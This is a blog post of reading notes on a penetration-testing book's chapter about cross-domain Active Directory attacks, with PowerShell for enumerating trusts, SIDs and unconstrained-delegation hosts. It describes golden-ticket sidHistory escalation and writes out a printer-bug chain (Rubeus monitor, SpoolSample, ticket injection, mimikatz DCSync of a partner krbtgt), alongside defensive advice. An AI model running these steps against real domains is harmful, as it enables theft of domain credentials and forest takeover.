Intranet Security Attack and Defense: A Practical Guide to Penetration Testing, reading notes (VII): cross-domain attack analysis and defense
2022-04-23 07:56:00 【Fish in Siyuan Lake】
Preface
Continuing my reading notes on "Intranet Security Attack and Defense: A Practical Guide to Penetration Testing". This chapter covers cross-domain attack analysis and defense: it walks through the typical ways a domain trust relationship is abused to move from one domain into another, and gives some advice on deploying a secure intranet production environment. The chapter itself is very short.
Large enterprises generally share resources through a domain forest:
- Departments are divided by function and, logically, into a parent (root) domain and child domains, so that they can be managed centrally.
- At the physical level, firewalls are usually used to separate subsidiaries and departments into different network zones.
- An attacker who has taken over the domain controller of one subsidiary or department, but not the whole corporate intranet (or whose target resources live in a different domain), will therefore look for a way to obtain privileges in the other departments' domains.
I. Cross-domain attack methods
Common cross-domain attack methods are:
- Conventional penetration techniques (for example, exploiting a vulnerability in a web application that is reachable from the other domain)
- Pass-the-hash or pass-the-ticket with a hash that is already known from the compromised domain (for example, when the administrator password on the DC is the same in both domains)
- Attacks that abuse the domain trust relationship itself
II. Cross-domain attacks using domain trust relationships
1. Introduction to domain trusts
Domain trusts exist to solve the problem of sharing resources across domains in a multi-domain environment:
- By default, every user in a given Windows domain can authenticate to the resources of that domain.
- A domain does not accept credentials from another domain unconditionally. If a user wants to access resources outside the boundary of the current domain, a domain trust is required.
- A domain trust is a mechanism that allows users of one domain, after authentication, to access resources in another domain.
- Within an Active Directory forest, the parent-child and tree-root trusts are two-way and transitive; Windows Server 2003 added forest trusts, which extend transitive trust to another forest. External trusts to a single domain are non-transitive.
- Only members of the Domain Admins (and Enterprise Admins) groups can manage domain trust relationships.
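As an added example (not code from the book or from this post), the following PowerShell enumerates the trusts visible from the current domain and forest with the .NET ActiveDirectory classes, and then decodes the raw trustAttributes bits of each trustedDomain object so that direction, transitivity and the SID-filtering (quarantine) state are explicit. It uses only .NET and ADSI, so it runs on any domain-joined host without RSAT; no host or domain names are assumed.

```powershell
# Added example: enumerate domain and forest trusts and decode trustAttributes.
Add-Type -AssemblyName System.DirectoryServices

function Get-DotNetTrusts {
    $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
    $forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
    # Domain-level trusts (ParentChild, TreeRoot, External, ...) plus forest trusts.
    @($domain.GetAllTrustRelationships()) + @($forest.GetAllTrustRelationships()) |
        ForEach-Object {
            [pscustomobject]@{
                Source    = $_.SourceName
                Target    = $_.TargetName
                Type      = $_.TrustType        # ParentChild, TreeRoot, Forest, External, Kerberos
                Direction = $_.TrustDirection   # Inbound, Outbound, Bidirectional
            }
        }
}

# Flag bits of the trustAttributes attribute (MS-ADTS, trustAttributes).
$NON_TRANSITIVE     = 0x1
$QUARANTINED_DOMAIN = 0x4    # SID filter quarantining, as set by "netdom trust ... /quarantine:yes"
$FOREST_TRANSITIVE  = 0x8
$WITHIN_FOREST      = 0x20

function Get-TrustAttributeSummary {
    # trustedDomain objects live in the System container of the current domain.
    $searcher = [adsisearcher]'(objectClass=trustedDomain)'
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('name', 'trustdirection', 'trustattributes'))
    foreach ($r in $searcher.FindAll()) {
        $attr = [int]$r.Properties['trustattributes'][0]
        $dir  = [int]$r.Properties['trustdirection'][0]   # 0 disabled, 1 inbound, 2 outbound, 3 both
        [pscustomobject]@{
            Partner      = [string]$r.Properties['name'][0]
            Direction    = @('Disabled', 'Inbound', 'Outbound', 'Bidirectional')[$dir]
            Transitive   = -not [bool]($attr -band $NON_TRANSITIVE)
            WithinForest = [bool]($attr -band $WITHIN_FOREST)
            ForestTrust  = [bool]($attr -band $FOREST_TRANSITIVE)
            # Not set on intra-forest trusts by default, so SIDs carried in sidHistory are
            # accepted across them; forest trusts filter SIDs by default even without this bit.
            Quarantined  = [bool]($attr -band $QUARANTINED_DOMAIN)
        }
    }
}

Get-DotNetTrusts          | Format-Table -AutoSize
Get-TrustAttributeSummary | Format-Table -AutoSize
```

The second table is the one a defender should read: every intra-forest trust will show WithinForest = True and Quarantined = False, which is exactly the condition the sidHistory techniques later in this chapter rely on.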
2. Gathering domain information
In a forest, members of the Enterprise Admins group (which exists only in the forest root domain) have full control over every domain in the forest. By default this group is a member of the Administrators group of every domain, so its members have administrative rights on every domain controller in the forest.
The LG.exe tool can be used to enumerate the users and groups of a remote host or domain:
// Enumerate the groups of a domain
lg.exe <domain name>\.
// Enumerate the local groups of a remote machine
lg.exe \\dc
// List the local users of a remote machine together with their SIDs
lg.exe \\dc -lu -sidsout
// List the members of a specified group together with their SIDs
lg.exe \\dc\administrators -sidsout
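The values the rest of this chapter needs are not the group names but the SIDs: the SID of the domain you already hold, the SID of the forest root, and the Enterprise Admins SID (root domain SID plus RID 519). As an added example (not the book's or the post's code), this PowerShell collects them and lists the current Enterprise Admins membership using .NET and ADSI only; it binds to the group by SID, so it still works if the group has been renamed. No names are assumed; everything is read from the forest the host is joined to.

```powershell
# Added example: collect the SIDs needed for the sidHistory techniques below.
Add-Type -AssemblyName System.DirectoryServices

function Get-DomainSid([string]$DnsName) {
    $ctx = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $DnsName)
    $dom = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($ctx)
    $raw = $dom.GetDirectoryEntry().Properties['objectSid'][0]   # byte[] form of the domain SID
    (New-Object System.Security.Principal.SecurityIdentifier($raw, 0)).Value
}

$current = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$root    = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().RootDomain

$currentSid = Get-DomainSid $current.Name
$rootSid    = Get-DomainSid $root.Name
$eaSid      = "$rootSid-519"   # Enterprise Admins is always RID 519 of the forest root domain

# Bind to Enterprise Admins in the root domain by SID and read its members (DNs).
$ea      = [ADSI]"LDAP://$($root.Name)/<SID=$eaSid>"
$members = @($ea.Properties['member'] | ForEach-Object { [string]$_ })

[pscustomobject]@{
    CurrentDomain       = $current.Name
    CurrentDomainSid    = $currentSid
    ForestRoot          = $root.Name
    ForestRootSid       = $rootSid
    EnterpriseAdminsSid = $eaSid
    EnterpriseAdmins    = $members -join '; '
}
```

If the host is in a child domain, CurrentDomainSid is the /sid value and EnterpriseAdminsSid the /sids value that mimikatz needs in the next two sections.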
3. Using the trust key (NTLM hash) to obtain privileges in the target domain
The trust key is the password hash of the inter-realm trust account; the KDCs use it to encrypt the referral TGTs exchanged across the trust. The attack is: use mimikatz to dump the trust key and forge an inter-realm trust ticket that carries the forest root's Enterprise Admins SID in sidHistory, use asktgs to exchange it for a service ticket (TGS) in the target domain, and use kirbikator to inject that TGS into memory, which yields privileges in the target domain.
Because mimikatz lets you set sidHistory when building a golden ticket, an attacker who obtains the krbtgt hash of any domain in the forest can use sidHistory to obtain full control of the whole forest.
4. Using the krbtgt hash to obtain privileges in the target domain
On the DC of the compromised (child) domain, use mimikatz to obtain the krbtgt hash; then, from an ordinary user context in the child domain, build and inject a golden ticket whose sidHistory contains the root domain's Enterprise Admins SID, which yields privileges in the target domain.
5. Using unconstrained delegation and MS-RPRN to obtain privileges across a trust
If the attacker holds a domain controller in the forest, or any server configured with unconstrained delegation, MS-RPRN (the print spooler RPC interface) can be used to make a domain controller of the trusting forest authenticate to the server the attacker controls; the captured TGT of that domain controller can then be used to obtain the hash of any user in the trusting forest.
Two tools are involved:
- Rubeus, to monitor for the incoming authentication: https://github.com/GhostPack/Rubeus
- SpoolSample, to trigger the authentication request: https://github.com/leechristensen/SpoolSample
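An added worked example of this section, not the book's or the post's commands. Hypothetical names: our forest is corp.local, the trusting partner forest is partner.local with domain controller dc02.partner.local, and srv01.corp.local is a server we already control that has unconstrained delegation. The first function is the check a defender (or attacker) runs to find such servers; the remaining commands are the attack steps. One caveat the book predates: since the July 2019 Windows updates, TGT delegation across forest trusts is disabled by default (netdom trust /EnableTGTDelegation:No), so across a forest trust the DC's TGT only arrives where an administrator has re-enabled it; inside one forest the technique still works as shown.

```powershell
# Added example: find unconstrained-delegation hosts, then the printer-bug chain.

# 1) Computers with TRUSTED_FOR_DELEGATION (0x80000) in userAccountControl, excluding
#    domain controllers (SERVER_TRUST_ACCOUNT, 0x2000), which always have the bit set.
function Get-UnconstrainedDelegationHosts {
    $filter = '(&(objectCategory=computer)' +
              '(userAccountControl:1.2.840.113556.1.4.803:=524288)' +
              '(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))'
    $searcher = [adsisearcher]$filter
    [void]$searcher.PropertiesToLoad.Add('dnshostname')
    foreach ($r in $searcher.FindAll()) { [string]$r.Properties['dnshostname'][0] }
}
Get-UnconstrainedDelegationHosts   # expect srv01.corp.local in the lab above

# 2) On srv01 (as local admin / SYSTEM), wait for a TGT arriving from the partner DC.
#    Older Rubeus builds name the filter /filteruser, newer ones /targetuser.
.\Rubeus.exe monitor /interval:5 '/filteruser:DC02$'

# 3) From any host that can reach the partner DC's spooler, trigger the callback via
#    MS-RPRN RpcRemoteFindFirstPrinterChangeNotificationEx (the "printer bug").
#    Arguments: <target DC that will authenticate> <capture server>.
.\SpoolSample.exe dc02.partner.local srv01.corp.local

# 4) The DC's forwarded TGT lands in srv01's LSASS and monitor prints it as base64.
#    Inject it and use the DC account's replication rights to DCSync the partner forest.
.\Rubeus.exe ptt '/ticket:<base64 ticket printed by monitor>'   # placeholder
.\mimikatz.exe 'lsadump::dcsync /domain:partner.local /user:PARTNER\krbtgt' exit
```

Step 1 is also the remediation check: any server the function returns that is not a domain controller should be moved to constrained or resource-based delegation, because a single compromise of it exposes the TGT of every account that authenticates to it, domain controllers included.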
III. Defending against cross-domain attacks
Internet-facing web applications usually sit behind a WAF and are checked regularly by operations staff, whereas intranet web applications (internal office systems, test servers and so on) are far more fragile: weak passwords and unpatched vulnerabilities are common there.
In many companies different departments are split into separate domains, but the domain administrators are the same people, so the domain administrator user name and password are often identical across domains.
It is therefore important to check whether the administrator password of one domain's DC is the same as the administrator password of the DCs in other domains. The same password on two DCs turns the trust-based techniques above into a plain pass-the-hash, with no trust key or krbtgt hash required.
Conclusion
This chapter is short; its main content is how a domain trust relationship is used to carry out a cross-domain attack.
Copyright notice
This article was written by [Fish in Siyuan Lake]; please include the link to the original when reposting. Thank you.
https://yzsam.com/2022/04/202204230628265116.html